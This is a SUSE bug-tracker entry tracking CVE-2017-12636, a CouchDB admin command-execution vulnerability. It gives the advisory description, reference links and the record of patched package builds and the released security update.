Bug 1068386 - (CVE-2017-12636) VUL-0: CVE-2017-12636: couchdb: CouchDB administrative users can configure the database server via HTTP(S). Someof the configuration options include paths for operating system-level binariesthat are subsequently launched by CouchDB. This
(CVE-2017-12636)
VUL-0: CVE-2017-12636: couchdb: CouchDB administrative users can configure th...
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
unspecified
Other Other
: P3 - Medium : Major
: ---
Assigned To: Security Team bot
Security Team bot
https://smash.suse.de/issue/194964/
CVSSv3:SUSE:CVE-2017-12635:8.1:(AV:N/...
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2017-11-16 07:21 UTC by Marcus Meissner
Modified: 2020-09-24 13:31 UTC (History)
3 users (show)

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Marcus Meissner 2017-11-16 07:21:22 UTC
CVE-2017-12636

CouchDB administrative users can configure the database server via HTTP(S). Some
of the configuration options include paths for operating system-level binaries
that are subsequently launched by CouchDB. This allows an admin user in Apache
CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as
the CouchDB user, including downloading and executing scripts from the public
internet.

References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12636
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12635
http://seclists.org/oss-sec/2017/q4/279
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12636
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12635
https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E
Comment 2 Keith Berger 2018-03-23 14:16:55 UTC
https://trello.com/c/I1KCfwb2
Comment 3 Jiří Suchomel 2018-03-26 11:02:59 UTC
So, building 1.7.1 version is not difficult:

https://build.suse.de/package/show/home:jsuchome:branches:Devel:Cloud:8/couchdb
Comment 4 Jiří Suchomel 2018-03-27 12:39:08 UTC
SR for Cloud8: https://build.suse.de/request/show/160311
Comment 6 Jiří Suchomel 2018-03-28 07:52:10 UTC
SR for SOC7: https://build.suse.de/request/show/160449
Comment 7 Jiří Suchomel 2018-04-04 09:24:55 UTC
Cloud packages updated
Comment 9 Jiří Suchomel 2018-07-24 15:21:33 UTC
Created maintenance request, I hope it's correct this way:

https://build.suse.de/request/show/168824
Comment 13 Swamp Workflow Management 2018-08-31 16:13:29 UTC
SUSE-SU-2018:2578-1: An update that fixes two vulnerabilities is now available.

Category: security (important)
Bug References: 1068386,1100973
CVE References: CVE-2017-12636,CVE-2018-8007
Sources used:
SUSE OpenStack Cloud 7 (src):    couchdb-1.7.2-2.8.2
SUSE Enterprise Storage 4 (src):    couchdb-1.7.2-2.8.2
Comment 14 Wolfgang Frisch 2020-09-24 13:31:40 UTC
Released.